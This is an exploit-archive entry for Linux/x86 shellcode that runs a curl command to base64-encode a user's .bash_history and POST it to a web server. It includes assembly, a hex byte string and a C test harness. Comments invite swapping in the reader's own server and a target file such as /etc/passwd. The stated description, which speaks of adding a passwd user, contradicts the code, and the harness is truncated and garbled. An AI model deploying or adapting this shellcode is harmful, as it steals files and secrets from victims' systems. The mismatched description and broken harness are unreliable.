Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)

ID: 101326
CVE: None
Download vulnerable application: None
# Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 125

This shellcode writes a new user to the given passwd file

Username = sshd
password = root
Shell = sh

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

  xor eax, eax
  push eax
  jmp short _cmd

  pop ecx
  mov edi, ecx
  xor ecx, ecx
  push eax
  push 0x68732f6e
  push 0x69622f2f

  mov ebx, esp
  push eax
  push word 0x632d
  mov esi, esp

  push eax
  push edi
  push esi
  push ebx

  mov ecx, esp
  mov al, 11
  int 0x80

  call _build
  msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
  ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
  ;change url to your server
  ; change file to you target file like /etc/passwd

 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c


 #include <stdio.h>
 #include <string.h>

 unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";

 void main()
     printf("Shellcode Length:  %d\n", strlen(shellcode));

     int (*ret)() = (int(*)())shellcode;
1.3.0 (www01)